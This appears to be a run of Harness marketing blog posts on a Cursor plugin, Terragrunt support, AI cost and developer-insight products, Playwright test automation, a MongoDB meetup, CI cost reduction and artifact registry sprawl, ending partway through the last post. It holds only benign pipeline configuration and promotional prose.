
TLDR: Today, Harness is introducing the Harness Cursor Plugin, bringing the power of the Harness AI-native software delivery platform directly into Cursor. This integration, along with the Harness Secure AI Coding hook for Cursor, allows developers and AI agents to move from code changes to vulnerability detection, CI/CD execution, security validation, approvals, deployments, and operational insight without leaving the editor.
AI has completely changed how we write code. You can spin up functions, refactor entire files, and generate tests in seconds. The inner loop, writing and iterating on code, has never been faster. But the moment you try to ship that code, everything slows down. This is what we call the AI Velocity Paradox.
You are suddenly back to juggling pipelines, waiting on approvals, checking security scans, debugging failed runs, and bouncing between tools just to get a change into production.
That gap, between fast code and slow delivery, is what we kept running into. So we built something to fix it.
Today, we are introducing the Harness Plugin for Cursor, a way to go from PR to production without leaving your editor.
If you are using agentic coding tools, such as Cursor, you have probably felt this.
You can:
But shipping still depends on everything outside your editor:
And none of that got simpler just because AI showed up. In fact, AI makes the problem more obvious.
Now you can create changes faster than your delivery process can safely handle. And if those controls are not tight, you are introducing a whole new category of risk. Fast-moving code with fragmented governance.
AI did not break software delivery. It exposed how disconnected it already was.
Instead of jumping between tools, what if you could just tell your editor what you want to happen?
Something like:
“Deploy PR #4821 to staging once the security scan passes, and Slack me if anything fails.”
That is the idea behind the Harness Cursor Plugin.
It connects Cursor directly to Harness, so you can trigger and manage your entire delivery workflow using natural language, right inside Cursor.

No tab switching. No manual orchestration. No guessing what is happening in the pipeline.
Once connected, you can use Cursor to interact with your delivery system just as you do with your code.
For example, you can:

This builds on what we introduced last month, Secure AI Coding, which integrates directly with Cursor and scans code at the moment of generation rather than waiting for a PR review. Developers see inline vulnerability warnings with the option to send flagged code back to the agent for remediation, without leaving their workflow. Under the hood, it leverages Harness's Code Property Graph (CPG) to trace data flows across the entire codebase, surfacing complex vulnerabilities that simpler linting tools would miss.
The key thing is that you are no longer just interacting with code. You are interacting with the entire delivery system from the same place.
One of the biggest concerns with AI in delivery is obvious:
“Are we about to let agents push code to production without guardrails?”
No.
With Harness, everything runs through the controls that you can rely on:

Instead of being manual checkpoints spread across tools, they are enforced automatically as part of the workflow while you stay in flow.
So AI can help move things faster, but it cannot bypass the governance that matters.
Most integrations today expose APIs or bolt AI onto existing systems. That is not what we wanted to do.
We designed the Harness Cursor Plugin specifically for how AI agents actually work:
Because shipping software is not a single action. It is a chain of decisions across CI, CD, security, approvals, and operations. If AI is going to help here, it needs access to that full picture. That’s where the Harness Software Delivery Knowledge Graph comes into play. It provides the necessary context for AI to take actions for you.
The knowledge graph models the relationships between services, pipelines, environments, policies, and operational signals in real time. Instead of treating each step in delivery as an isolated task, it creates a connected system of record that AI can reason over. This allows agents to understand not just what to do, but when and why to do it, based on dependencies, risk signals, and historical behavior.

In practice, this means smarter automation: deployments that adapt to context, approvals that are triggered based on policy and impact, and faster root cause analysis because the system already understands how everything is connected.
This is not just about convenience. It is a shift in how software actually moves from idea to production.
Instead of:
You get a single, connected workflow:
All accessible from your editor. Cursor accelerates the building. Harness governs the shipping. And the handoff between the two disappears.
Watch the demo:
If you want to try it:
For example:
“Run the CI pipeline for this branch, check if the security scan passed, and promote to staging if it did.”
That is it.
AI is not just changing how we write code. It is changing expectations for how fast we should be able to ship it. But speed without control does not work in real environments. What we are building toward is something simpler:
A world where every step, from PR to production, is:
Without forcing developers to leave their flow. This plugin is one step in that direction.

“We’ve been operating in a hybrid environment with both OpenTofu and Terragrunt, and Harness has made it much easier to bring those workflows together into a single, consistent platform with IaCM. The addition of Terragrunt support is a valuable step toward simplifying how we manage infrastructure at scale.”
— Lead Platform Engineer, Enterprise Customer
Infrastructure as Code is now a standard for modern cloud operations, with most enterprises using IaC to provision and manage environments. However, as adoption grows, so does complexity. Teams are no longer managing a handful of environments. They are operating across multiple regions, accounts, and services, often at massive scale.
This is where traditional approaches begin to fall short.
As organizations scale their infrastructure, Terraform alone is often not enough. Teams adopt Terragrunt to manage complex, multi-environment deployments, but they are often forced to stitch together fragmented tooling that lacks visibility, governance, and consistency.
At Harness, we are changing that.
Today, we are excited to announce native Terragrunt support in Harness IaCM, bringing it to full parity with Terraform and OpenTofu while delivering capabilities that go beyond what is available in standalone tooling. This is more than support. It is about making Terragrunt a first-class platform for enterprise infrastructure management.
With Harness IaCM, teams can now:

Terragrunt has become a critical layer for managing infrastructure at scale because it simplifies how teams structure and reuse configurations across environments. Harness builds on that foundation with deep, native integration, enabling platform teams to operate with both flexibility and control.
This is especially important for enterprises where a single deployment spans multiple environments and services. Harness abstracts that complexity while maintaining governance, auditability, and consistency.
Terragrunt is part of a broader shift toward multi-tool infrastructure strategies.
Modern teams are no longer standardized on a single IaC tool. Instead, they operate across:

This creates challenges around consistency, visibility, and governance. Harness IaCM is built for this reality. We are evolving IaCM into a unified control plane for multi-IaC workflows, where teams can manage different frameworks with a consistent experience, shared policies, and centralized visibility.
This means:
Instead of managing infrastructure in silos, teams can now operate from a single platform across the entire lifecycle.
The next phase of Infrastructure as Code is not just about supporting more tools. It is about making infrastructure systems more intelligent and automated.
We are investing in two key areas:
We are continuing to support modern frameworks like AWS CDK, enabling developer-centric infrastructure workflows alongside provisioning, configuration, and orchestration tools.
We are introducing intelligence into IaC workflows to simplify tasks such as drift management and optimization. This helps teams reduce manual effort and operate more efficiently at scale.
Together, these investments move IaCM toward a unified, multi-IaC platform that combines flexibility, governance, and automation. Terragrunt has become essential for managing infrastructure at scale but until now, it hasn’t had a platform that truly supports it. As infrastructure continues to grow in complexity, our focus remains the same. Helping teams move faster, reduce risk, and scale with confidence no matter which IaC tools they use.

The release of Anthropic Mythos and Project Glasswing marks an exciting and pivotal new chapter in software development. As the industry advances, the speed and economics of vulnerability exploitation have fundamentally shifted. What once took weeks of manual reconnaissance can now be scaled rapidly through automated models. However, this is not just a security problem to solve. It is a massive engineering opportunity to build cleaner, more robust systems. By leaning into AI-accelerated defense, engineering teams are uniquely positioned to lead the charge and redesign the landscape of modern software architecture.
To succeed in this new era, the traditional silos separating security and engineering must fall. Defense at machine speed requires a unified front.
The foundation of AI-accelerated defense relies on sound, proactive engineering practices. Developers must take ownership of architectural hygiene from the ground up.
Even with the best architecture, unexpected friction will occur. Resilient engineering means planning comprehensively for your ecosystem.
To keep pace with the increased velocity of engineering teams, Security teams must also evolve their operational models.
Engineering leaders and developers are in the perfect position to navigate this industry inflection point. By taking ownership of these structural changes today, you ensure the long-term viability of your products and the enduring strength of your codebase. Bring your security, infrastructure, and engineering teams together into the same room and start building your shared roadmap today.


Gartner expects worldwide AI software spending to hit $2.59 trillion in 2026, 47% more than organizations spent last year. The dollars are real and growing fast. But most organizations still can't measure the ROI of that spend.
The problem has two sides: developers and infrastructure. On the developer side, engineers are using AI to write nearly every line of new code, and leaders have no way to tell whether that spend is producing software that ships. On the infrastructure side, agents in production consume tokens with every customer interaction, every resolved ticket, every automated workflow, and the invoice is the only signal on whether any of it is worth what it costs.
Organizations can tell you what they spend on AI. Very few can tell you what they got for it. According to our 2026 State of Engineering Excellence report, 94% of engineering leaders say the metrics that matter most are missing from their current measurement frameworks.
Today, Harness is launching two products to close both gaps.
AI DLC Insights builds on Harness Software Engineering Insights and ties every AI-generated line of code to the PR, ticket, and deployment it produced, so engineering leaders can see where token spend is turning into shipped work and where it isn't.
Cloud & AI Cost Management extends Harness Cloud Cost Management with unit economics, anomaly detection, and budget governance for every dollar of AI infrastructure spend, so the question "is this agent worth what it costs?" finally has a number behind it.
"AI spend isn't the conversation anymore — ROI is. Every dollar we put into AI, from tokens consumed to customers served, has to earn its keep. That's what my executives are asking about today."
Josefa Roche, Sr. Cloud FinOps Engineer, Revionics, an Aptos Company
Every developer writing software today is coding with AI. Copilot, Cursor, Claude, Gemini: the tools vary but the pattern is universal. Adoption is not the problem.
The problem is that token spend has never been connected to efficiency or outcomes. Developers generate code with AI coding agents, a fraction of it ships, prompts are longer than necessary, and generated code gets rejected in review. Engineering leaders have no visibility into any of it — not the ship rate, not the wasted tokens, not the rejected code.
Harness CEO Jyoti Bansal recently described this behavior as tokenmaxxing: an engineer burns 500K tokens generating code that gets rejected in review. By the leaderboard, they beat the engineer who shipped a clean 50-line patch. Tokenmaxxing made sense as a forcing function when adoption was the goal. That phase has an expiration date.
AI DLC Insights includes a new on-machine developer agent that runs directly in the developer's environment. It observes the IDE and terminal in real time, captures every AI-generated line of code, records the token cost per model and tool, and maps that spend through the delivery chain to the PR, the ticket, and the deployment that shipped.
An engineering leader can now say "it cost us $5,200 in AI credits to fix that bug" and mean it. Here’s what’s in the release:

Fig. 1: AI DLC Insights gives engineering leaders a unified view of AI adoption, spend efficiency, and delivery impact across coding agents, teams, and workflows.
Once an AI agent ships to production, a different cost equation takes over. Every customer interaction, every resolved ticket, every automated workflow triggers inference. The spend is continuous, scales with usage, and in most organizations is visible only at the invoice level. That tells you which line item is growing, but tells you nothing about whether the spend growth is worth it.
A $28,000 monthly spend on a customer support agent is a completely different number depending on how many tickets it resolved. If it cost $0.60 per resolved ticket and the human alternative costs more, it is one of the best investments in your stack. If the math runs the other way, you are paying more for automation than the process it replaced. Most organizations cannot tell the difference today.
Cloud & AI Cost Management closes that gap. Harness connects directly to your AI providers and production agents, capturing spend at the level of each individual request and tying it to the agent, session, or workflow that triggered it. The same cost categories, budgets, and anomaly detection already running on your cloud spend now apply to every AI token your infrastructure consumes.
A finance leader can finally answer the question the business is asking: is this agent worth what it costs? Here’s what’s in the release:

Fig. 2: AI Cost Unit Economics dashboard connects total AI spend to the metrics that matter, giving leaders a cross-provider breakdown of cost per token, per inference, and per session across providers.

Fig. 3: AI spend, attributed by agent. At a glance: which agents are growing, which sessions are getting more expensive, and what AI cost looks like as a share of revenue.

Fig. 4: Run-level waterfall for a single agent run. The cost and latency of every step, every model call, and every tool invocation, with span attributes for debugging.
AI DLC Insights answers the developer question: is token spend turning into shipped work? Cloud & AI Cost Management answers the infrastructure question: is each agent worth what it costs in production? Both questions now have a direct answer in the same platform.
The first phase of enterprise AI was adoption. The next is about proving the tools are worth their cost. The organizations that can show where the money goes and what it produces will spend the next dollar with confidence. The rest will keep approving line items they can't explain.
AI DLC Insights and Cloud & AI Cost Management are available in beta now. [Learn more]


AI coding tools made code generation faster. Measuring what actually ships is the hard part.
Over the last eighteen months, tools like Cursor, Claude Code, Copilot, and Windsurf have fundamentally changed how software gets built. AI-generated pull requests are increasing, developers are producing more code than ever before, and workflows that once took hours now happen in minutes. But most organizations struggle to clearly explain what that investment is actually producing.
Only a fraction of AI-generated code ultimately survives review and reaches production, yet engineering leaders still lack visibility into which coding agents improve delivery performance and which workflows simply contribute to tokenmaxxing with no clear ROI.
That gap exists because traditional engineering systems were built for a world where development started with a commit. But AI fundamentally changed where the software development lifecycle begins. Development no longer starts with a commit. It starts with a prompt. The model choice, token consumption, generated code, review cycles, deployments, and production outcomes are now all part of the same engineering workflow. Measuring only what happens after code is committed is no longer enough.
That shift is what led Harness to evolve Software Engineering Insights into AI DLC Insights, to help organizations measure how AI-generated work moves through the entire development lifecycle from prompt to production.
These three operational gaps exist inside almost every team running AI at scale today:
These three gaps are exactly what AI DLC Insights is organized around. Together, they give engineering leaders a complete picture of what AI is producing inside their engineering organization, from the first prompt to the last deployment.
The first question starts with understanding what AI adoption actually looks like at the team and individual level. Seat counts and API usage aggregates give you a surface view. Understanding whether AI-generated code is actually making it into production requires something deeper.
Most engineering systems were never designed to observe AI-assisted development workflows directly. Source control can show what was committed. Billing systems can show token consumption. Neither can explain which generated code actually survived review, reached production, or improved delivery performance.
That is why AI DLC Insights introduces a new Agent that runs directly inside the developer environment. The agent observes AI interactions in real time, captures AI-generated code, tracks token consumption across coding agents and models, and connects that activity directly to commits, pull requests, deployments, and production outcomes.

What that makes visible:
Developer token consumption is increasing every month, but most teams still cannot explain which workflows are producing production-ready code and which are simply burning tokens.
That gap exists because token spend and engineering outcomes typically live in completely separate systems. Finance teams can see the monthly invoice, while engineering teams can see sprint activity and pull requests. Connecting token consumption directly to shipped code, deployment velocity, and engineering throughput is still difficult for most organizations.
As tokenmaxxing behaviors emerge, activity can easily be mistaken for impact. Some workflows generate meaningful production-ready code and improve delivery throughput, while others consume enormous amounts of tokens without improving what actually ships.

AI DLC Insights closes that gap, breaking down spend by developer, team, agent, and workflow:
Adoption and efficiency are inputs. Impact is the output. And the output is not lines of code generated or tokens consumed. Its features shipped, bugs resolved, lead time reduced, security posture improved, and customers getting better software faster.
More AI-generated code does not automatically produce those outcomes. Without the right visibility, AI adoption can quietly produce the opposite: more code volume with more review burden, more complexity with more regressions, faster generation with slower delivery cycles. The organizations that catch those patterns early are the ones that maintain quality as velocity increases.

AI DLC Insights connects AI activity to the delivery metrics that reveal what is happening downstream:
The first generation of engineering analytics platforms measured software delivery after the commit. The next generation will measure how humans and AI systems build software together.
Boards are no longer asking whether engineering teams are using AI coding tools. They’re asking whether the investment is improving software delivery in measurable ways. Whether teams are shipping more production-ready code. Whether delivery metrics are moving alongside token consumption. Whether the spend is generating real engineering leverage or just increasing the invoice.
Answering those questions requires visibility into how AI-generated code actually behaves across the full development lifecycle, from the prompt that created it to the deployment that shipped it.
That is what AI DLC Insights was built to deliver.
Ready to prove the ROI of your AI engineering investment? Request a demo to learn more.


Companies are shipping AI features at a pace cloud teams have rarely seen. New agents, new copilots, new flows powered by language models, all moving from prototype to production in weeks. The spend that comes with it is real and accelerating, and most teams are seeing it on the invoice before they see it anywhere else.
The question is no longer how much you're spending on AI. It's whether each dollar is producing a real outcome, and whether you can govern that spend before the next invoice arrives.
This release brings AI cost into Harness Cloud & AI Cost Management (CACM). Visibility, attribution, and unit economics for the AI workloads your teams are running, alongside the cloud cost data you’re already managing in Harness.
Harness has been close to developers and the delivery lifecycle for a long time. Catching cost problems early, before they show up on a finance review, has been part of how we think about CCM from the beginning.
AI is the next surface where that approach matters. The cost curves on AI workloads behave differently from cloud infrastructure. A small change to a prompt or a model can move spend by an order of magnitude. A retry loop in an agent can burn a month of budget in an afternoon.
Across customer conversations and analyst briefings, the same questions kept coming back. How do we know what we’re spending on AI today, across providers and across teams? How do we attribute that spend to the products, features, and customers driving it. How do we tell whether an AI feature is economical at the unit level, not just at the invoice level. The data exists, but it’s scattered across provider invoices, gateway dashboards, observability tools, and cloud bills. Nobody has it in one place, allocated the way the rest of cloud spend is allocated.
Harness AI Cost Management brings AI spend into the same FinOps platform Harness customers already use for cloud cost. The same Cost Categories, the same Perspectives, the same Budgets, the same Anomaly Detection, now extended to AI workloads.
At the center is unit economics. Every dollar of AI spent is tied to the agent, session, and outcome it produced, so the question shifts from "what did we spend" to "what did we get for it." Your customer-support copilot didn't cost $28,000 last month — it cost $0.60 per resolved ticket. Agent ROI becomes a number you can act on, not an estimate buried in an invoice. Around that core, the release delivers unified visibility across every provider and managed service, anomaly detection that catches cost spikes before they hit the invoice, and budget governance that holds AI spend to what the business actually approved. AI spend can be explored across providers, attributed to teams and products, and decomposed at the level where AI workloads actually run — application, agent, run, step, and LLM call.
AI cost data lives in several places, and each one tells you something different. Harness supports three ingestion paths so customers can match the depth of attribution to what they actually need:
The release ships the following capabilities.
Unit economics surfaced natively, for measuring AI outcomes.

AI Cost Economics Dashboard, showing unit economics across agents and sessions
Unified visibility across native LLM providers and managed AI services. OpenAI and Anthropic for direct API spend. AWS Bedrock and GCP Vertex AI for managed AI services. Spend is normalized across providers so comparisons and analysis don’t require custom pipelines.
Per-model and per-version cost tracking, with input and output token volumes, inference counts, and trends. Useful for evaluating model choice, watching the impact of a model upgrade, and identifying which models are growing fastest in spend.
Cost attributed to AI agents, whether internal copilots, customer-facing assistants, or background automations. Inferences, session cost, token usage, and trends, surfaced per agent so engineering and product teams can evaluate cost-per-outcome at the agent level.

AI Cost Drivers Overview, showing applications and agents with spend per run and P95 cost per run
Attribute AI spend to any customer-defined construct, including business unit, product line, customer tier, or feature. Built on the existing Cost Categories framework, so the rules teams have already written for cloud chargeback now apply to AI spend with no extra setup.

AI cost grouped by Cost Category, using the same allocation rules as cloud cost
Cost per session, cost per multi-turn interaction, and token composition broken down by call. This is the level of detail provider billing APIs can’t give. A multi-turn conversation that costs four times an average session because the agent is looping through a tool chain becomes visible, attributable, and fixable.
Take a customer-support copilot as an example. The total invoice tells you the bot cost twenty-eight thousand dollars last month. Useful, but it doesn’t tell you whether that’s good or bad. Unit cost reframes the same data as cost per resolved ticket. If a session costs sixty cents and the bot resolves the issue without a human, that’s a deal. If a session costs four dollars because the agent is looping through tools it shouldn’t be using, that’s a problem to fix in code, not in finance.


Run Detail, showing a step-level cost waterfall for a single agent run
Filter and group AI spend by the dimensions that matter for AI workloads:
Drill down from business-level metrics to raw cost data, with filters that compose the way they do everywhere else in CCM.

AI Cost Explorer, with provider, model, and token-type filters applied
Most AI cost tools are point solutions. They show you AI spend in isolation, with their own dashboards, their own allocation model, and their own definition of cost. They give you a number. They don't give you ROI, and they don't give you control. Harness brings AI cost into the FinOps platform you already use, applies the same primitives that govern cloud spend, and goes deeper where AI workloads need it.
Four things make this combination work:
Harness gives engineering and FinOps teams complete visibility into AI spend, from model and token-level usage up to business-level impact. Using a combination of provider connectors, AI gateway telemetry, and OpenTelemetry traces, Harness tracks AI cost at the session and agent level across major providers and ties it into the same Cost Categories, Perspectives, Budgets, and Anomaly Detection used for cloud cost.
This lets teams answer the questions that matter as AI moves from experiment to production. What are we actually spending on AI. Which teams, products, and features are driving the spend. Where are costs about to spike before the invoice arrives. And at the unit level — cost per agent run, cost per resolved ticket, cost per outcome — is it worth it.
.png)
.png)
Key Takeaway: Harness AI Test Automation now runs existing Playwright suites without code changes, adds AI-powered failure triage, and integrates test results directly into build and deployment pipelines.
Playwright has become the industry standard for end-to-end testing. Most engineering teams already have suites (sometimes hundreds of specs) running against their applications.
Writing the tests isn't the hard part anymore. Running them reliably, at CI speed, with meaningful feedback when things break: that's where teams still struggle.
The numbers tell the story:
Teams at Google, Dropbox, and Spotify have each built dedicated internal systems just to manage test flakiness and infrastructure. That's engineering investment that should go toward the product.
Harness AI Test Automation now lets you bring your existing Playwright projects and run them natively on the platform.
Your playwright.config, your spec files, your package.json scripts stay in your repo, exactly where they live today. Point Harness at your project root, and we run your suite using your config, extending it with reporters and trace settings that power AI triage and the Tests tab. No code changes required.
Why this matters:
Teams have invested months, often years, building and stabilizing their Playwright suites. A testing platform shouldn't ask you to throw that away and start over. Your stable tests stay exactly as they are. Tests that are flaky or hard to maintain can gradually evolve into AI-generated intent-based tests when you're ready, but there's no rewrite tax to get started.
Run in the cloud with parallel workers. No grid to configure, no nodes to scale, no browser images to maintain. Need to test an application behind a firewall? Secure tunnels handle private apps without exposing your network.
When a test fails, Harness automatically classifies it: regression, flaky, performance, or environment issue. You get the failure location, retry patterns, likely root cause, and a recommended fix. No more sifting through stack traces to figure out if the problem is real.
Engineers spend time fixing problems, not investigating whether the problem is real.
Some assertions are hard to express in code. "Does this page look correct?" "Is the checkout flow in a valid state?" "Does the error message make sense for this scenario?"
With the Harness SDK, you can add AI-powered assertions directly into your Playwright scripts. Hard-to-write assertions become simple natural-language questions. No complex selector logic, no brittle pixel comparisons. Your scripts stay in Playwright. The assertions just get smarter.
Playwright runs are native pipeline steps, not a service bolted onto your CI. If tests fail, the pipeline fails. Code is blocked from production. Every deployment is validated, every result is tied to a specific commit.
No context switching to an external dashboard. Results live in the pipeline's Tests tab, alongside your build and deploy stages.
When Playwright runs locally, one developer's test results are invisible to the rest of the team. Failures get investigated in isolation. Patterns go unnoticed. Knowledge stays siloed.
On Harness, every execution is visible to every developer. Teams can review each other's test runs, spot recurring failures together, and build a shared understanding of test health across the entire suite.
Test results are connected to the commit that triggered them and the deployment they validated. When something breaks in production, you can trace back through the exact test run, the exact code change, and the exact environment, all in one place.
Most external test execution services solve one problem well: running browsers at scale. But they leave you to stitch together the rest. CI integration, reporting, triage, and quality gating are your responsibility.
With native pipeline integration:
This isn't about choosing between scripted tests and AI. It's about using each where it's strongest.
Playwright delivers the reliable, repeatable execution your Harness CI/CD pipeline demands. Harness AI layers intelligence on top: triaging failures so you don't waste cycles investigating, generating assertions that would be painful to hand-code, and eventually creating new test cases from your requirements and code.
Bring your Playwright suite to Harness AI Test Automation. Connect your repo, point us at your project root, and run your first execution in minutes -- with AI failure triage included.
Interested to try this out. Please reach out to ait-interest@harness.io
Q1: Can I use my existing playwright.config without changes? Yes. Harness reads your existing playwright.config, spec files, and package.json scripts directly from your repo. No migration, no wrapper config, no reformatting. Point Harness at your project root and your suite runs as-is.
Q2: How does Harness handle flaky Playwright tests? When a test fails, Harness automatically classifies the failure — regression, flaky, performance, or environment issue — and surfaces the likely root cause alongside a recommended fix. Instead of sifting through raw logs, engineers see a verdict on whether the failure is real before they spend time investigating it.
Q3: Do I need to manage browser infrastructure or Docker images? No. Harness runs your Playwright suite in the cloud with parallel workers. Browser dependencies, Docker images, shard configuration, and compute scaling are all handled by the platform. For applications behind a firewall, secure tunnels support private app testing without exposing your network.
Q4: How is this different from BrowserStack or LambdaTest? External test grids solve browser execution at scale but leave CI integration, failure triage, and quality gating to you. With Harness, test results live natively in your pipeline, failures automatically block deployments, and AI triage is built in — no separate observability tool or custom webhook configuration required.
Q5: Can I add AI-powered assertions to my existing Playwright scripts? Yes, via the Harness SDK. You can add natural-language assertions directly into your existing Playwright scripts — things like "is the checkout flow in a valid state?" or "does this error message make sense for this scenario?" — without complex selector logic or brittle pixel comparisons. Your scripts stay in Playwright; the assertions just get smarter.


On May 16th, 2026, Inspired by the growing MongoDB and DevOps community in Bengaluru, we partnered with the Namma MUG community to bring together engineers exploring automation, CI/CD, Infrastructure as Code, and database migration strategies for modern applications.We had been looking forward to for a long time at Harness, our first Database DevOps community event in India focused on MongoDB and modern database automation practices.
The event was a deep dive for experts into how database automation can work with MongoDB easily, without needing manual steps.

My session on OSS Native Mongo Executor initiative was attended by several engineers already using tools like Liquibase, Flyway, and ORM driven migration workflows. That led to incredibly valuable conversations around what Database DevOps should look like for MongoDB-native environments.
Interestingly, many attendees wanted to understand:
We also had several deep discussions around CI/CD production rollout strategies and the differences between native Mongo execution and traditional relational migration engines.
These discussions were incredibly insightful because they showed that teams are no longer thinking only about “Database Scripts” - they are thinking about full database delivery workflows integrated into DevOps platforms.
One clear thing we heard throughout all our discussions was how much people want easier ways to get started and more hands-on examples for working with MongoDB DevOps. People kept asking us for simple guides for beginners, real examples of how to set up Continuous Integration and Continuous Delivery (CI/CD), starting templates, and clear steps for moving and rolling back databases from start to finish. We also got into some deep technical talks about handling complex queries, moving databases while they are live, and making sure our deployments are reliable, especially when we talk about advanced ways to undo changes.
A lot of the attendees were really curious about how our MongoDB-native ways of doing migrations are different from the older, traditional database methods. That led us into bigger discussions about why using native MongoDB tools is important, how we manage schema changes in NoSQL, and the unique problems we face with document databases as we move from simple open-source tools to big enterprise-level Database DevOps systems. Overall, the reaction to our new OSS Native Mongo Executor was fantastic! It was clear that people really liked our approach of building Database DevOps features that fit naturally with MongoDB, instead of trying to force old relational rules onto a NoSQL system.
The future of Database DevOps is expanding beyond relational systems, and it’s exciting to see the MongoDB community helping shape that journey with us. A huge thank you to everyone who joined us, especially the speakers and community members who made the event successful: Naveen Kumar, Narendra Gottipati.Pritesh Kiri, Aripriya Basu
For us at Harness, this meetup made us realise something important: The community is actively looking for better ways to automate MongoDB operations while maintaining reliability, governance, and developer velocity. We have a lot more events coming up which you can join - Harness · Events Calendar





Continuous integration (CI) costs can escalate quickly as engineering teams scale. While most organizations focus on cloud bills, the true cost of CI includes slow build times, developer wait time, inefficient test execution, and overprovisioned infrastructure.
CI cost optimization is the practice of reducing the total cost of CI pipelines by improving build efficiency, minimizing compute usage, and eliminating unnecessary work without slowing down development.
In this guide, you will learn how to reduce CI costs using four proven strategies: test optimization, intelligent caching, infrastructure right-sizing, and governance controls. Teams that implement these approaches often reduce build times and costs by 50 to 75 percent, while improving developer productivity and feedback cycles.
CI costs extend far beyond your cloud invoice. They include both direct infrastructure expenses and indirect productivity losses.
Research on developer productivity shows that interruptions can take 15 to 25 minutes to recover focus. When builds are slow or unreliable, this hidden cost compounds across teams and often exceeds infrastructure spend.
CI costs are primarily driven by four factors:
Understanding these drivers is the first step toward meaningful cost reduction.
Testing is typically the largest contributor to CI runtime and cost. Optimizing test execution delivers the highest return on investment.
Most teams run their full test suite on every commit. This is inefficient, especially in large repositories.
Selective test execution runs only the tests affected by a code change.
Benefits:
For example, large engineering teams using test selection techniques have reduced build times from more than 20 minutes to under five minutes, saving significant developer time.
Flaky tests are tests that fail intermittently without code changes. They introduce hidden costs:
Industry studies suggest flaky tests consume a measurable portion of engineering productivity.
Best practices:
Running tests sequentially is inefficient.
Parallelization distributes tests across multiple runners, reducing execution time.
Example:
Parallelization may not significantly reduce total compute usage, but it dramatically reduces developer wait time, which is often the larger cost.
CI pipelines often repeat the same work, such as downloading dependencies or rebuilding artifacts.
Caching reduces redundant work by reusing previous outputs.
High-impact caching targets include:
An effective caching strategy includes:
In controlled benchmarks, Docker layer caching and dependency reuse have shown significant improvements in build performance.
However, many teams underutilize caching by applying it inconsistently or misconfiguring cache keys.
Key insight:
There is a difference between simply enabling caching and implementing a well-optimized caching strategy.
CI workloads are well-suited for cost optimization because they are stateless, short-lived, and parallelizable.
Cloud providers offer spot instances at discounts of up to 90 percent compared to on-demand pricing.
Why they work for CI:
Important nuance:
Retries are usually manageable, but frequent interruptions can impact time-sensitive pipelines.
Many teams use oversized instances by default.
Right-sizing involves:
This reduces cost without affecting performance.
Static runner pools create inefficiencies:
Auto-scaling allows:
Teams that optimize infrastructure often achieve:
Without guardrails, CI costs tend to increase over time.
Policy as Code enables automated enforcement of cost controls.
Examples:
Tools such as Open Policy Agent are commonly used for this purpose.
You cannot optimize what you cannot measure.
Key metrics include:
Dashboards and analytics help identify inefficiencies and cost drivers.
To reduce CI costs effectively, start with clear metrics.
Establish a baseline and track improvements:
A phased approach helps teams implement changes effectively.
The expected impact is a 30 to 50 percent improvement.
This phase delivers the largest improvements.
This ensures long-term cost control.
These strategies can be implemented manually, but doing so requires significant effort.
Modern CI platforms provide:
This reduces operational overhead and improves consistency.
CI costs do not have to scale with your team size. By focusing on efficiency, you can reduce costs while improving developer experience.
The most effective strategies are:
The key difference is not just tooling but intentional optimization.
Want to reduce CI costs without slowing development?
Explore how modern CI platforms can help optimize test execution, caching, and infrastructure, so your team can build faster while reducing spend.
Developer wait time. Slow builds reduce productivity and increase context switching.
Most teams achieve 30 to 75 percent cost reduction, depending on their starting point.
Yes. CI workloads are well-suited for spot instances, though retries may occasionally occur.
Start with:


Three weeks into a platform modernization project, this question landed in my inbox: "Why does our deployment pipeline take 40 minutes instead of four?"
This is artifact repository sprawl in practice, and it does more than slow pipelines. It fragments your security posture, your compliance evidence, and your ability to answer basic questions like "what's actually running in production right now?"
Modern software delivery pipelines consume and produce artifacts at every stage. A typical microservices application might pull base container images, install language-specific packages, bundle compiled binaries, and push versioned containers, all before a single integration test runs. When each artifact type lives in a separate registry, every pipeline stage authenticates separately, fetches metadata independently, and logs access in disconnected audit systems.
The operational cost compounds quickly. Build jobs that should complete in minutes stall while waiting for credential rotation across four registry providers. Terraform modules reference hardcoded repository URLs that break when teams migrate between vendors. Developers waste hours debugging "works on my machine" issues that trace back to different registries serving different cached versions in CI versus local environments.
Container registry management alone doesn't solve this. You can centralise Docker images perfectly and still have sprawl across Maven Central proxies, PyPI mirrors, and npm registries that each handle authentication, scanning, and access policies differently. The sprawl persists even when every tool works correctly in isolation.
What this actually looks like in a pipeline:
# A typical fragmented pipeline - four different auth mechanisms, four different APIs
stages:
- name: Pull Base Image
spec:
connectorRef: docker_hub_connector # Registry 1: Docker Hub
image: node:20-alpine
- name: Install Dependencies
spec:
command: npm install # Registry 2: npm registry (or private Verdaccio)
- name: Build Java Service
spec:
command: mvn package # Registry 3: Maven Central / Artifactory
- name: Push Container
spec:
connectorRef: ecr_connector # Registry 4: Amazon ECR
repo: my-app
tags: <+pipeline.sequenceId>Four registries, four sets of credentials to rotate, four places to check when something breaks. Now multiply that by every microservice in your org.
Software supply chain governance requires knowing what entered your build process, who approved it, and whether it matches what shipped to production. Artifact repository sprawl makes that visibility nearly impossible without building custom integration layers that inevitably lag behind the registries they monitor.
Consider a realistic scenario: your security team needs to answer whether a new CVE affects any production workload. With fragmented registries, you're querying Docker Hub for container manifests, Artifactory for Java dependencies, a separate S3 bucket for ML models, and hoping the correlation logic catches every transitive dependency. Miss one registry in the sweep and you've got an incomplete answer. Get the timing wrong and you're correlating artifacts from different build windows.
Unified artifact management changes the equation. When containers, packages, and models flow through a single governance boundary, you can enforce consistent policies at ingestion time rather than auditing violations after deployment. Access control becomes auditable in one place instead of five.
This matters for supply chain attacks targeting package managers, which increasingly exploit the trust developers place in upstream dependencies. When every language ecosystem has its own registry with different security scanning capabilities and policy enforcement mechanisms, attackers optimize for the weakest link. A malicious npm package that wouldn't pass container scanning slips through because the npm registry didn't apply the same controls.
How a unified registry changes incident response:
# Fragmented approach: check each registry separately
1. Query Docker Hub for affected container manifests (minutes)
2. Query Artifactory for affected Java dependencies (minutes)
3. Query npm registry for affected Node packages (minutes)
4. Cross-reference results manually (hours)
5. Hope you didn't miss a registry (uncertainty)
# Consolidated approach: one query, full picture
1. Search artifact registry for component with CVE ID (seconds)
2. View which artifacts contain the dependency (SBOM) (seconds)
3. Check Deployments tab for production exposure (seconds)
4. Full answer with audit trail (confidence)Platform engineering teams building internal developer portals face a choice: abstract away registry complexity or force application teams to manage it themselves. Neither option works well with artifact sprawl. Abstraction requires maintaining integration code for every registry type, each with different APIs for search, versioning, and access control. Forcing teams to manage it themselves guarantees inconsistent practices and duplicate effort across squads.
